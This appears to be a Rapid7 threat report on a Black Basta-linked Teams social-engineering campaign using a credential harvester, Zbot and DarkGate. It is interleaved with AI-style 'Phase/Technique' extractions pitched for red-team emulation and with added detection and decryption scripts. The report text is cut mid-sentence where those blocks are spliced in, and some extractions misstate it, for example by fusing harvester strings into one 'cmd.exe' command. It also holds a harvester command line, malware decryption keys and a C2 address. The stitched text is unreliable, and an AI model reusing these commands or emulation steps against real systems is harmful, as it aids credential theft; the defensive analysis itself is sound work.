InsightIDR, Managed Detection and Response, and Managed Threat Complete customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage.
Below is a non-exhaustive list of detections that are deployed and will alert on behavior related to this activity:

Detections
  • Suspicious Chat Request - Potential Social Engineering Attempt
  • Initial Access - Potential Social Engineering Session Initiated Following Chat Request
  • Suspicious Conversation - Potential Social Engineering Message Interaction
  • Attacker Technique - Process Executed Using Nt Object Path
  • Suspicious Process - Enumeration Burst via ShellExecute
  • Attacker Technique - Renamed Kaspersky Dump Writer
  • Ransomware - Possible Black Basta Related Binary Execution
  • Credential Access - Steal or Forge Kerberos tickets
  • Suspicious Process - Diskshadow (Windows Server) Delete Shadow Copies
  • Non-Approved Application - Remote Management and Monitoring (RMM) Tools

MITRE ATT&CK Techniques

Tactic | Technique | Procedure
  • Resource Development | T1587.001: Develop Capabilities: Malware | The threat actor is actively developing new malware to distribute.
  • Impact | T1498: Network Denial of Service | The threat actor overwhelms email protection solutions with spam.
  • Initial Access | T1566.004: Phishing: Spearphishing Voice | The threat actor calls impacted users and pretends to be a member of their organization’s IT team to gain remote access.
  • Defense Evasion | T1140: Deobfuscate/Decode Files or Information | The threat actor encrypts some zip archive payloads with a password.
  • Defense Evasion | T1055.002: Process Injection: Portable Executable Injection | Multiple payloads executed by the threat actor utilize local PE injection.
  • Defense Evasion | T1620: Reflective Code Loading | Multiple payloads executed by the threat actor load and execute shellcode.
  • Credential Access | T1649: Steal or Forge Authentication Certificates | The threat actor has distributed numerous signed malware payloads.
  • Credential Access | T1056.001: Input Capture: Keylogging | The threat actor runs an executable that harvests the user’s credentials.
  • Credential Access | T1558.003: Steal or Forge Kerberos Tickets: Kerberoasting | The threat actor has performed Kerberoasting after gaining initial access.
  • Discovery | T1033: System Owner/User Discovery | The threat actor enumerates asset and user information within the environment after gaining access.
  • Command and Control | T1572: Protocol Tunneling | The threat actor has attempted to use SSH reverse tunnels.
  • Command and Control | T1219: Remote Access Software | The threat actor has used QuickAssist, AnyDesk, ScreenConnect, TeamViewer, Level, and more, to facilitate remote access.

Indicators of Compromise

Indicators of compromise are available here.
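An autorun triage routine that ties together the two persistence mechanisms described in the analysis above, added here as an example (not code from the article or from Rapid7): Zbot persists through a Run value or a scheduled task that launches its copy from a random folder under %APPDATA%, and DarkGate through a Run value, named with a per-infection hash, that runs a copy of Autoit3.exe with a compiled .a3x script from a folder under C:\ProgramData. Because the folder and value names are random per infection, the checks key on the structure of the command rather than on the names seen in the analysed samples; the seven-letter a-h value name is flagged only as a weak signal, an observation from the hash table above rather than a documented property. The entries are constructed; on a real host they would come from HKCU\...\CurrentVersion\Run and the scheduled task list, and the folder names Qwxk and Xk9q are mine.

```python
"""Autorun triage for the Zbot and DarkGate persistence patterns.

Added example, not from the Rapid7 article. Entries below are constructed.
"""
import re
from dataclasses import dataclass


@dataclass
class AutorunEntry:
    source: str     # "run_key" or "scheduled_task"
    name: str       # Run value name or task name
    command: str    # command line the entry executes


# Zbot-style: an .exe in a freshly named folder directly under %APPDATA% (Roaming).
APPDATA_VAR = re.compile(r'^"?%APPDATA%\\[A-Za-z0-9]{4,}\\[^\\]+\.exe"?\s*$', re.I)
APPDATA_ABS = re.compile(
    r'^"?[A-Za-z]:\\Users\\[^\\]+\\AppData\\Roaming\\[A-Za-z0-9]{4,}\\[^\\]+\.exe"?\s*$', re.I)
# DarkGate-style: Autoit3.exe from a ProgramData folder executing a .a3x from ProgramData.
AUTOIT_PROGRAMDATA = re.compile(
    r'^"?[A-Za-z]:\\ProgramData\\[^\\]+\\Autoit3\.exe"?\s+"?[A-Za-z]:\\ProgramData\\[^\\]+\\[^\\]+\.a3x"?\s*$',
    re.I)
# Weak signal only: every hash in the analysed sample was seven letters from a-h (assumption
# that this holds across infections; the key is randomised at runtime).
HASH_STYLE_NAME = re.compile(r"[a-h]{7}")


def triage_entry(entry: AutorunEntry) -> list:
    """Return the list of reasons this entry looks like campaign persistence (empty if none)."""
    cmd = entry.command.strip()
    reasons = []
    if AUTOIT_PROGRAMDATA.match(cmd):
        reasons.append("autoit_from_programdata")
    if APPDATA_VAR.match(cmd) or APPDATA_ABS.match(cmd):
        reasons.append("exe_in_random_appdata_dir")
    if entry.source == "run_key" and HASH_STYLE_NAME.fullmatch(entry.name):
        reasons.append("hash_style_value_name")
    return reasons


def triage(entries) -> dict:
    """Map entry name -> reasons, for entries that raised at least one reason."""
    return {e.name: reasons for e in entries if (reasons := triage_entry(e))}


# Constructed entries: two campaign-style, one scheduled-task Zbot-style, two benign.
SAMPLE_ENTRIES = [
    AutorunEntry("run_key", "daaadeh",
                 r"C:\ProgramData\hedfdfd\Autoit3.exe C:\ProgramData\hedfdfd\dgfeabe.a3x"),
    AutorunEntry("scheduled_task", "SyncSuite",
                 r"C:\Users\alice\AppData\Roaming\Qwxk\SyncSuite.exe"),
    AutorunEntry("run_key", "Updater", r"%APPDATA%\Xk9q\Updater.exe"),
    AutorunEntry("run_key", "OneDrive",
                 r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    AutorunEntry("run_key", "SecurityHealth", r"%windir%\system32\SecurityHealthSystray.exe"),
]

if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_ENTRIES).items():
        print(f"{name}: {', '.join(reasons)}")
```

Each reason is kept separate so an analyst can weigh them: an AutoIt interpreter launched from ProgramData is a strong indicator on its own, whereas an executable in a random Roaming folder needs a second look at the file's signature and prevalence before it is acted on.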

ChatGPT 4o Paged


Phase: Initial Access

  • Technique: Email Bombing and Social Engineering
  • Procedure: The attacker signs up the user's email address to multiple online subscriptions to overwhelm the inbox.

Phase: Initial Access

  • Technique: Phishing via Microsoft Teams
  • Procedure: The attacker sends a phishing message through Microsoft Teams, containing links or attachments with malicious content.

Phase: Execution

  • Technique: JavaScript Execution
  • Command: Execution of a JavaScript file attached or linked in the phishing message to run malicious code on the user’s machine.

Phase: Payload Delivery

  • Technique: Use of Malicious Documents and Links
  • Procedure: Users are tricked into downloading a document or clicking a link, leading to the download of malicious payloads (e.g., Zbot, DarkGate, and custom malware).

Phase: Defense Evasion

  • Technique: Obfuscation
  • Procedure: The malware uses obfuscation techniques to avoid detection by security solutions.

Phase: Persistence

  • Technique: Scheduled Task Creation
  • Command (inferred): Usage of scheduled tasks to establish persistence, likely via commands like schtasks /create with parameters for executing payloads at specified intervals.

Phase: Credential Access

  • Technique: Credential Dumping
  • Procedure (inferred): Likely use of tools such as Mimikatz or custom scripts to extract credentials from memory.

Phase: Lateral Movement

  • Technique: Credential Use
  • Procedure (inferred): Use of harvested credentials to move laterally across the network, possibly using tools like PsExec or WMI.

Phase: Impact

  • Technique: Data Encryption for Impact
  • Procedure: Deployment of Black Basta ransomware to encrypt files and demand ransom from the victim.

numerous mailing lists simultaneously. After the email bomb, the threat actor will reach out to the impacted users. Rapid7 has observed that the initial contact still occurs primarily through Microsoft Teams, by which the threat actor, as an external user, will attempt to call or message the impacted user to offer assistance. The account domains in use include both Azure/Entra tenant subdomains (e.g., username[@]tenantsubdomain[.]onmicrosoft[.]com) and custom domains (e.g., username[@]cofincafe[.]com). In many cases, Rapid7 has observed that the threat actor will pretend to be a member of the target organization’s help desk, support team, or otherwise present themself as IT staff.

Below are examples of Microsoft Teams display names observed by Rapid7 to be in use by operators. The display names may or may not be padded with whitespace characters. Rapid7 has also observed threat actors use a first and last name, as the chat display name and/or account username, to impersonate an IT staff member within the targeted organization.

Operator Chat Display Name
Help Desk
HELP DESK
Help Desk Manager
Technical Support
Administracion

If the user interacts with the lure, either by answering the call or messaging back, the threat actor will attempt to get the user to install or execute a remote management (RMM) tool, including, but not limited to, QuickAssist, AnyDesk, TeamViewer, Level, or ScreenConnect. Rapid7 has also observed attempts to leverage the OpenSSH client, a native Windows utility, to establish a reverse shell. In at least one instance, the threat actor shared a QR code with the targeted user. The purpose of the QR code is unconfirmed but appears to be an attempt to bypass MFA after stealing a user’s credentials. The URL embedded within the QR code adheres to the following format: hxxps://[.]qr-[.]com.

Phase: Initial Access

  • Technique: Social Engineering via Phishing (Impersonation)
  • Procedure: The threat actor uses Microsoft Teams to impersonate IT staff and contact users. Display names such as "Help Desk" and "Technical Support" are employed to build trust.

Phase: Execution

  • Technique: Remote Management Tool Deployment
  • Procedure: The attacker persuades the user to install or execute an RMM tool like QuickAssist, AnyDesk, TeamViewer, Level, or ScreenConnect.

  • Technique: Reverse Shell Establishment
  • Command: Leverage the OpenSSH client to establish a reverse shell. Command syntax may include using PowerShell or cmd to invoke the SSH client for reverse connections.

Phase: Attack Techniques

  • Technique: MFA Bypass Attempt
  • Procedure: The attacker shares a QR code potentially designed to bypass MFA after credential theft. The URL embedded follows a specific pattern to appear legitimate.

This structured extraction can be used by a red team to simulate the attacker’s TTPs for security testing and training purposes.

Figure 1. A QR code (obfuscation by Rapid7) sent by an operator.

In a majority of cases, Rapid7 has observed that the operator, after gaining access to the user’s asset via RMM tool, will then attempt to download and execute additional malware payloads. In one case handled by Rapid7, the operator requested more time — potentially to hand off the access to another member of the group.

Figure 2. An operator stalls for time.

The payload delivery methods vary per case, but have included external compromised SharePoint instances, common file sharing websites, servers rented through hosting providers, or even direct upload to the compromised asset in the case of RMM tool remote control. In one case, the operator used the group’s custom credential harvester to dump the user’s credentials, the results of which were subsequently uploaded to a file sharing site — publicly exposing the stolen credentials. SharePoint has been used to distribute copies of AnyDesk portable, likely to circumvent security measures that would prevent the user from downloading it directly from anydesk[.]com. Such attempts have been blocked by web proxy in previous cases.

The overall goal following initial access appears to be the same: to quickly enumerate the environment and dump the user’s credentials. When possible, operators will also still attempt to steal any available VPN configuration files. With the user’s credentials, organization VPN information, and potential MFA bypass, it may be possible for them to authenticate directly to the target environment.

Rapid7 has observed usage of the same credential harvesting executable, previously reported as AntiSpam.exe, though it is now delivered in the form of a DLL and most commonly executed via rundll32.exe. Whereas before it was an unobfuscated .NET executable, the program is now commonly contained within a compiled 64-bit DLL loader. Rapid7 has analyzed at least one sample that has also been obfuscated using the group’s custom packer. The newest versions of the credential harvester now save output to the file 123.txt in the user’s %TEMP% directory, an update from the previous qwertyuio.txt file, though versions of the DLL distributed earlier in the campaign would still output to the previous file.

Phase: Initial Access

  • Technique: Use of Remote Monitoring and Management (RMM) Tools
  • Procedure: Attacker gains access to user's asset via an RMM tool.

Phase: Execution

  • Technique: Rundll32 Execution for Payload Delivery
  • Command: rundll32.exe <path_to_DLL>,<entry_point>

Phase: Credential Dumping

  • Technique: Custom Credential Harvester (DLL)
  • Tool: AntiSpam.exe DLL version
  • Procedure: Execution via rundll32.exe with output saved to 123.txt in user’s %TEMP% directory.

Phase: Persistence (Potential Inference)

  • Technique: AnyDesk Portable Distribution
  • Procedure: Distribute AnyDesk portable via SharePoint to evade security measures.

Phase: Reconnaissance

  • Technique: Environment Enumeration
  • Procedure: Enumerate the environment quickly following initial access.

Phase: Data Exfiltration

  • Technique: Use of Public File Sharing Sites
  • Procedure: Upload stolen credentials to a file-sharing site, publicly exposing them.

Figure 3. The credential harvesting prompt shown to the user upon executing the DLL (redaction by Rapid7).

The credential harvester is most commonly followed by the execution of a loader such as Zbot (a.k.a. Zloader) or DarkGate. This can then serve as a gateway to the execution of subsequent payloads in memory, facilitate data theft, or otherwise perform malicious actions. Rapid7 has also observed operators distributing alternate payload archives containing Cobalt Strike beacon loaders and a pair of Java payloads containing a user credential harvester variant and a custom multi-threaded beacon by which to remotely execute PowerShell commands. In some cases, operators have sent the user a short command, via Teams, which will then begin an infection chain after execution by the targeted user.

Rapid7 continues to observe inconsistent usage of the group’s custom packer to deliver various malware payloads, including their custom credential harvester. A YARA rule is now publicly available that can be used to detect the packer. For example, this packer was used to deliver several obfuscated versions of Black Basta ransomware, obtained via open source intelligence, which directly links operators to the ongoing social engineering campaign.

At the time of writing, the threat actors behind the campaign continue to update both their strategy for gaining initial access and the tools subsequently used. For example, around the time the most recent campaign activity began, Rapid7 observed the delivery of a timestamped and versioned payload archive,

Phase: Initial Access

  • Technique: Phishing with Malicious DLL
  • Procedure: The attacker lures the user into executing a DLL that presents a credential harvesting prompt.

Phase: Execution

  • Technique: Loader Execution
  • Procedure: Execution of loaders such as Zbot (Zloader) or DarkGate to deliver payloads in memory.

Phase: Persistence

  • Technique: Obfuscated Loaders
  • Procedure: Use of a custom packer to deliver malware payloads, including credential harvesting and custom Cobalt Strike beacon loaders.

Phase: Command and Control

  • Technique: PowerShell Remote Commands
  • Procedure: Execution of PowerShell commands via a custom multi-threaded beacon delivered as a Java payload.

Phase: Lateral Movement

  • Technique: Social Engineering via Teams
  • Procedure: Sending a command through Teams to the user to initiate an infection chain.

Phase: Impact

  • Technique: Ransomware Deployment
  • Procedure: Deployment of Black Basta ransomware using obfuscated versions delivered through custom packers.

171024_V1US.zip (2024-10-17, version 1, US), which, when compared to a more recently delivered archive, 171124_V15.zip (2024-11-17, version 15), highlights the rapid iteration being undertaken. Many of the payloads being delivered follow a similar pattern as previous activity and often consist of a legitimate file where an export or function entry point has been overwritten to jump to malicious code, and the result is signed with a likely stolen code signing certificate.

Intrusions related to the campaign should be taken seriously — the intent goes beyond typical phishing activity. Past campaign activity has led to the deployment of Black Basta ransomware. While Rapid7 has handled a high volume of incidents related to the current social engineering campaign across a variety of customer environments, to date, every case has been contained before the operator was able to move laterally beyond the targeted user’s asset.

Technical Analysis

Initial Access

Each attack is preceded by the targeted user receiving an often overwhelming number of emails. An operator will then attempt to contact the user via Microsoft Teams, either via messaging or calling, by which they will pretend to offer assistance. Operators will attempt to impersonate the organization’s help desk, such as by using the names of existing staff members. During this social engineering stage, operators often need to troubleshoot with the user to establish remote control of the user’s asset. Based on the environment, for example, RMM tool downloads or execution may be blocked (often some, but not all) or QuickAssist may be disabled, causing the operator to cycle through their options for establishing a foothold. One of the most common first steps after gaining either the confidence of the user, or remote access, is to execute a custom credential harvester.
Credential Harvesting

The credential harvester used by operators, for example SafeStore.dll (SHA256: 3B7E06F1CCAA207DC331AFD6F91E284FEC4B826C3C427DFFD0432FDC48D55176), is an updated version of the previously analyzed program AntiSpam.exe. The DLL variant of the credential harvester is executed by a command like the following example:

rundll32.exe SafeStore.dll,epaas_request_clone

The module will quickly execute three enumeration commands to gather system information — systeminfo, route print, ipconfig /all — and then prompt the user for their password. The user’s credentials are appended onto a new line of the text file 123.txt with each attempt, after the enumeration command output, regardless of whether the credentials are correct. If the user enters the wrong password, they will be prompted to try again. The output for the enumeration commands and the user’s credentials were saved to the file qwertyuio.txt in older versions of the harvester, but are now saved to 123.txt, within the user’s %TEMP% directory. The enumeration commands within the updated version are executed via successive calls to CreateProcessA.
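The execution chain just described (rundll32.exe loading the harvester DLL by export name, the three enumeration commands spawned in quick succession, and the output file in %TEMP%) is a good fit for behavioural detection. The following is an added example written for this page, not Rapid7's code or the harvester's: it runs three checks over process and file events. The event records are constructed to resemble Sysmon-style process-creation and file-creation events, but the field names (ts, pid, ppid, image, cwd, cmdline, path) are this example's own, and the username and paths in them are made up.

```python
"""Detection logic for the credential-harvester execution chain described above.

Added example, not Rapid7's code. It flags three things the text describes:
  1. rundll32.exe loading a DLL from a user-writable directory by export name
     (e.g. rundll32.exe SafeStore.dll,epaas_request_clone),
  2. one parent spawning all three enumeration commands (systeminfo,
     route print, ipconfig /all) inside a short window,
  3. a file write to 123.txt or the older qwertyuio.txt inside a Temp folder.
The event records are constructed for this example; field names are the
example's own, not any product's schema.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

USER_WRITABLE = re.compile(
    r"^[a-z]:\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\", re.I)
RUNDLL32_ARGS = re.compile(r'^"?(?P<dll>[^,"]+?)"?\s*,\s*(?P<export>\S+)')
HARVESTER_OUTPUT = re.compile(r"\\temp\\(123|qwertyuio)\.txt$", re.I)
ENUM_SET = {"systeminfo", "route print", "ipconfig /all"}


def _basename(image):
    return image.rsplit("\\", 1)[-1].lower().removesuffix(".exe")


def enum_key(image, cmdline):
    """Map a process to one of the three enumeration commands, or None."""
    name = _basename(image)
    args = cmdline.lower().split()[1:]
    if name == "systeminfo":
        return "systeminfo"
    if name == "route" and "print" in args:
        return "route print"
    if name == "ipconfig" and "/all" in args:
        return "ipconfig /all"
    return None


def rundll32_target(image, cmdline, cwd):
    """Return (dll_path, export) for a rundll32 call; a bare DLL name resolves against cwd."""
    if _basename(image) != "rundll32":
        return None
    parts = cmdline.split(None, 1)
    if len(parts) < 2:
        return None
    m = RUNDLL32_ARGS.match(parts[1].strip())
    if not m:
        return None
    dll = m.group("dll").lower()
    if not re.match(r"^[a-z]:\\", dll):
        dll = cwd.lower().rstrip("\\") + "\\" + dll
    return dll, m.group("export")


def detect(events, window=timedelta(seconds=60)):
    """Return a list of (alert_kind, pid, ...) tuples for the given events."""
    alerts = []
    enum_seen = defaultdict(dict)   # parent pid -> {enum command: first timestamp}
    burst_alerted = set()
    for ev in events:
        ts = datetime.fromisoformat(ev["ts"])
        if ev["type"] == "process":
            target = rundll32_target(ev["image"], ev["cmdline"], ev["cwd"])
            if target and USER_WRITABLE.match(target[0]):
                alerts.append(("rundll32_user_writable_dll", ev["pid"], target[0], target[1]))
            key = enum_key(ev["image"], ev["cmdline"])
            if key:
                seen = enum_seen[ev["ppid"]]
                seen.setdefault(key, ts)
                if (set(seen) == ENUM_SET and ev["ppid"] not in burst_alerted
                        and max(seen.values()) - min(seen.values()) <= window):
                    burst_alerted.add(ev["ppid"])
                    alerts.append(("enumeration_burst", ev["ppid"], sorted(seen)))
        elif ev["type"] == "file" and HARVESTER_OUTPUT.search(ev["path"]):
            alerts.append(("harvester_output_file", ev["pid"], ev["path"]))
    return alerts


# Constructed sample events: one harvester run plus two benign look-alikes.
_DL = r"C:\Users\jdoe\Downloads"
SAMPLE_EVENTS = [
    {"type": "process", "ts": "2024-11-18T10:00:00", "pid": 4100, "ppid": 3900,
     "image": r"C:\Windows\System32\rundll32.exe", "cwd": _DL,
     "cmdline": "rundll32.exe SafeStore.dll,epaas_request_clone"},
    {"type": "process", "ts": "2024-11-18T10:00:01", "pid": 4101, "ppid": 4100,
     "image": r"C:\Windows\System32\systeminfo.exe", "cwd": _DL, "cmdline": "systeminfo"},
    {"type": "process", "ts": "2024-11-18T10:00:02", "pid": 4102, "ppid": 4100,
     "image": r"C:\Windows\System32\ROUTE.EXE", "cwd": _DL, "cmdline": "route print"},
    {"type": "process", "ts": "2024-11-18T10:00:03", "pid": 4103, "ppid": 4100,
     "image": r"C:\Windows\System32\ipconfig.exe", "cwd": _DL, "cmdline": "ipconfig /all"},
    {"type": "file", "ts": "2024-11-18T10:00:09", "pid": 4100,
     "path": r"C:\Users\jdoe\AppData\Local\Temp\123.txt"},
    # benign: Control Panel applet via a system DLL, and a lone ipconfig
    {"type": "process", "ts": "2024-11-18T10:05:00", "pid": 5000, "ppid": 4800,
     "image": r"C:\Windows\System32\rundll32.exe", "cwd": r"C:\Windows\System32",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
    {"type": "process", "ts": "2024-11-18T10:06:00", "pid": 5001, "ppid": 4800,
     "image": r"C:\Windows\System32\ipconfig.exe", "cwd": r"C:\Windows\System32",
     "cmdline": "ipconfig /all"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The rundll32 rule keys on the DLL's location rather than on the file name or export, since both have changed between samples in this campaign; the enumeration rule fires only when all three commands share a parent within the window, so a lone ipconfig /all from an administrator does not trigger it.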

Phase: Initial Access

  • Technique: Social Engineering via Email and Microsoft Teams
  • Procedure: Operators send numerous emails followed by contacting the user on Microsoft Teams, impersonating the organization's help desk.

Phase: Execution

  • Technique: Remote Access Tool
  • Procedure: Utilize RMM tools or QuickAssist for remote control if enabled; otherwise, explore alternatives based on environment restrictions.

Phase: Credential Harvesting

  • Technique: DLL Execution with Rundll32
  • Command: rundll32.exe SafeStore.dll,epaas_request_clone
  • Procedure: Executes system enumeration commands and prompts user for credentials:
  • Commands:
    • systeminfo
    • route print
    • ipconfig /all
  • Output: Appends enumeration data and user credentials to %TEMP%\123.txt.

Phase: System Information Discovery

  • Technique: Command-Line Interface
  • Commands:
  • systeminfo
  • route print
  • ipconfig /all
  • Procedure: Executed via CreateProcessA to gather system details and write outputs to a file.

Figure 4. Success and failure messages for the credential harvester.

Based on analysis of one credential harvester sample, EventCloud.dll, the program was present in shellcode form. The shellcode is decrypted from the Cursor Group 880 resource embedded within the executable, using the XOR key 5A 3C 77 6E 33 30 4D 38 4F 38 40 78 41 58 51 30 42 5F 3F 67 71 00, and then injected locally. The following strings, which were extracted from the shellcode, show the output file and list dynamically loaded libraries:

Credential Harvester Strings
cmd.exe /c %s%s %s%s%s%s
123.txt
ooki
Update filter
kb_outl
Need credentials to update...
Username:
Password:
ntdll.dll
Gdi32.dll
user32.dll
msvcrt.dll
ucrtbase.dll
Comctl32.dll
Advapi32.dll
kernel32.dll

The Java variant of the credential harvester, identity.jar, provides a similar prompt to the user, though when a password is entered it is appended, without the username, to a .txt file with a random 10-letter alphabetic name in the current working directory. The cancel button on the prompt, shown below, is not functional and the prompt is drawn on top of other windows, meaning that it will not close until the user

Phase: Execution

  • Technique: Shellcode Injection
  • Procedure: The shellcode within EventCloud.dll is decrypted using a specified XOR key and injected locally.

Phase: Credential Access

  • Technique: Credential Harvesting via Prompt
  • Procedure: The Java variant, identity.jar, displays a credential prompt to the user. Entered passwords are appended to a .txt file with a random 10-letter alphabetic name in the current working directory. The prompt's cancel button is non-functional and remains on top of other windows.

Phase: Execution (Command Line)

  • Technique: Command Execution via cmd.exe
  • Command: cmd.exe /c %s%s %s%s%s%s 123.txt ooki
  • Context: This suggests a command execution involving concatenation of variables and output to a text file 123.txt.

Observed Libraries Loaded:

  • DLLs:
  • ntdll.dll
  • Gdi32.dll
  • user32.dll
  • msvcrt.dll
  • ucrtbase.dll
  • Comctl32.dll
  • Advapi32.dll
  • kernel32.dll

These libraries are possibly used for various functions related to the credential harvesting and execution process.

has entered their password correctly.

Figure 5. The credential harvesting prompt created by identity.jar.

Malware Payloads

Following execution of a credential harvester, an operator will typically infect the asset with Zbot or DarkGate. One of the Zbot samples delivered after initial access, SyncSuite.exe (SHA256: DB34E255AA4D9F4E54461571469B9DD53E49FEED3D238B6CFB49082DE0AFB1E4), contains similar functionality and strings to other Zbot/Zloader samples previously reported by ZScaler. However, in addition to previously observed strings, the sample also contains encrypted strings for an embedded command help menu, error messages, and more. Rapid7 observed the embedded malware version was 2.9.4.0.

Upon execution, the malware will copy itself to a random folder within the %APPDATA% directory. If the file does not have its original filename, however, the process will immediately exit. The malware also contains the functionality to establish persistence either via a Run key at HKCU\Software\Microsoft\Windows\CurrentVersion\Run or a scheduled task named after the executable, which executes the malware copy in %APPDATA% whenever the user logs on. After collecting the hostname, username, and the installation date from the InstallDate value contained within the registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion, this data is concatenated (delimited by underscore characters) and encrypted, along with other config information. It is then stored within the user’s registry inside a random key created at HKCU\Software\Microsoft. The analyzed sample will also load a fresh copy of ntdll.dll to avoid hooking, which is then used to perform calls to

Phase: Initial Access

  • Technique: Credential Harvesting
  • Procedure: The threat actor uses identity.jar to present a credential prompt for harvesting user credentials.

Phase: Execution

  • Technique: Malware Execution (Zbot)
  • Program: SyncSuite.exe
  • Procedure: Executes the Zbot malware, which then copies itself to a random folder within the %APPDATA% directory. If the malware is renamed, it will immediately exit.

Phase: Persistence

  • Technique: Registry Run Key and Scheduled Task
  • Procedure 1: Creates or modifies a Run key at HKCU\Software\Microsoft\Windows\CurrentVersion\Run to execute a copy of the malware in %APPDATA% upon user logon.
  • Procedure 2: Establishes a scheduled task named after the executable to ensure persistent execution on user logon.

Phase: Defense Evasion

  • Technique: Unhooked Execution
  • Procedure: Loads a fresh copy of ntdll.dll to avoid potential hooking by security products.

Phase: Information Gathering

  • Technique: System Information Discovery
  • Procedure: Collects hostname, username, and installation date from the InstallDate value in the registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion.

Phase: Data Exfiltration Preparation

  • Technique: Data Encoding and Storage
  • Procedure: Concatenates and encrypts the collected data with other configuration information, then stores the encrypted data within a randomly created key in the registry at HKCU\Software\Microsoft\.

NTAPI functions. SyncSuite.exe ultimately injects itself into a suspended instance of msedge.exe, created using NtCreateUserProcess and executed via ResumeThread, a technique known as Process Hollowing.

All of the strings used by the malware are stored encrypted within the .rdata section along with the configuration. The strings are decrypted using an obfuscated loop that is ultimately a simple XOR operation with the hard-coded key 16 EB D5 3E AA E6 51 09 14 D3 DF 18 AD D6 1B BD BE, which is also stored in the .rdata section. The configuration is decrypted using an RC4 key, F3 F9 F7 FB FA F3 F7 F7 FF F5 F2 F3 FA FD FE F2 for this sample. The decrypted configuration for SyncSuite.exe can be seen below, with empty rows removed. The configuration contains a different public RSA key and botnet ID than the one previously shared by ThreatLabz, indicating that the campaign is being run by a different affiliate. All decrypted strings from SyncSuite.exe can be seen in the Zbot Strings section following other Indicators of Compromise.

Figure 6. The decrypted Zbot configuration for SyncSuite.exe (1264 bytes).

Rapid7 has also observed the delivery of DarkGate malware following initial access. One payload archive
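The two keys quoted above are all an analyst needs to decrypt material carved from the .rdata section: the string table is a repeating-key XOR and the configuration is plain RC4. The following helpers are an added example for this page, not Rapid7's or Zloader's code. Function names (key_from_hex_dump, xor_repeating, rc4, decrypt_zbot_strings) are this example's own, the assumption that decrypted strings are NUL-separated is this example's and not stated in the analysis, and the four-byte ciphertext is constructed here because the page shows no raw bytes. The same XOR helper applies to the EventCloud.dll resource key listed earlier, taken exactly as quoted there, trailing 00 included.

```python
"""Apply the SyncSuite.exe keys quoted in the analysis to carved .rdata blobs.

Added example, not Rapid7's or Zloader's code. Keys are entered in the
page's space-separated hex form. The sample ciphertext is constructed for
this example; the functions are meant to run on bytes carved from a sample.
"""


def key_from_hex_dump(dump):
    """Turn 'F3 F9 F7 ...' (the form used in the write-up) into bytes."""
    return bytes.fromhex(dump.replace(" ", ""))


# Keys as quoted for SyncSuite.exe.
ZBOT_STRING_XOR_KEY = key_from_hex_dump("16 EB D5 3E AA E6 51 09 14 D3 DF 18 AD D6 1B BD BE")
ZBOT_CONFIG_RC4_KEY = key_from_hex_dump("F3 F9 F7 FB FA F3 F7 F7 FF F5 F2 F3 FA FD FE F2")


def xor_repeating(data, key):
    """XOR data with key cycled over its length; the operation is its own inverse."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def rc4(key, data):
    """Standard RC4 (key scheduling + keystream). Encrypt and decrypt are the same call."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_zbot_strings(blob, key=ZBOT_STRING_XOR_KEY):
    """Decrypt a carved string blob and split on NUL terminators (assumed layout)."""
    return [s.decode("latin-1") for s in xor_repeating(blob, key).split(b"\x00") if s]


def decrypt_zbot_config(blob, key=ZBOT_CONFIG_RC4_KEY):
    """Decrypt a carved configuration blob with the sample's RC4 key."""
    return rc4(key, blob)


# Constructed sample: the word "Zbot" XORed with the first four key bytes.
SAMPLE_STRING_BLOB = bytes.fromhex("4c89ba4a")

if __name__ == "__main__":
    print(decrypt_zbot_strings(SAMPLE_STRING_BLOB))   # ['Zbot']
    cfg = b"constructed configuration bytes"
    assert decrypt_zbot_config(rc4(ZBOT_CONFIG_RC4_KEY, cfg)) == cfg
```

Because both operations are their own inverse, the same functions round-trip data, which is a convenient sanity check before pointing them at a real carve: a wrong offset into .rdata shows up as non-printable output from decrypt_zbot_strings.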

Phase: Defense Evasion

  • Technique: Process Hollowing
  • Procedure: SyncSuite.exe injects itself into a suspended instance of msedge.exe, created using NtCreateUserProcess and executed via ResumeThread.

Phase: Execution

  • Technique: Code Injection
  • Command/Procedure: Injection into msedge.exe after process is hollowed to execute malicious code.

Phase: Decryption

  • Technique: Encrypted String Decryption
  • Procedure: Strings are decrypted using an obfuscated loop with a simple XOR operation using the hardcoded key: 16 EB D5 3E AA E6 51 09 14 D3 DF 18 AD D6 1B BD BE.

  • Technique: Configuration Decryption
  • Procedure: Configuration is decrypted using an RC4 key: F3 F9 F7 FB FA F3 F7 F7 FF F5 F2 F3 FA FD FE F2.

Phase: Command and Control

  • Technique: Dynamic Configuration Update
  • Procedure: The decrypted configuration contains a different public RSA key and botnet ID, implying dynamic updates to maintain control and adapt to defenses.

These extracted procedures outline key techniques and processes employed in the attack, enabling red teams to emulate and study the methods used.

contained both a DarkGate infection initiation script, test.vbs, and an executable copy of the DarkGate malware itself, SafeFilter.exe (SHA256: EF28A572CDA7319047FBC918D60F71C124A038CD18A02000C7AB413677C5C161), though this copy is packed using the group’s custom packer. The final payload containing the DarkGate malware, after several layers of decrypting and loading, contains the version string 7.0.6. If the folder c:\debugg exists on the system when the malware is executed, it will display the version number via MessageBoxA. The configuration for this sample can be seen below along with hard coded commands. Notably, the campaign ID for the sample appears to be drk2.

Figure 7. DarkGate displays its version using a debug message box.

The configuration is decrypted with the key ckcilIcconnh within a customized XOR loop near the beginning of execution to reveal CRLF delimited options. However, due to the implementation of the decryption loop, the keyspace is effectively reduced to that of a single byte (0-255) after the first byte. This makes the XOR key for the majority of the config 0x60 for this sample, allowing the encrypted data to be trivially bruteforced.

Key-Value Pair (SafeFilter.exe DarkGate Config) / Description

0=179.60.149[.]194|
    C2 domains or IP addresses, delimited with ‘|’ characters
8=No
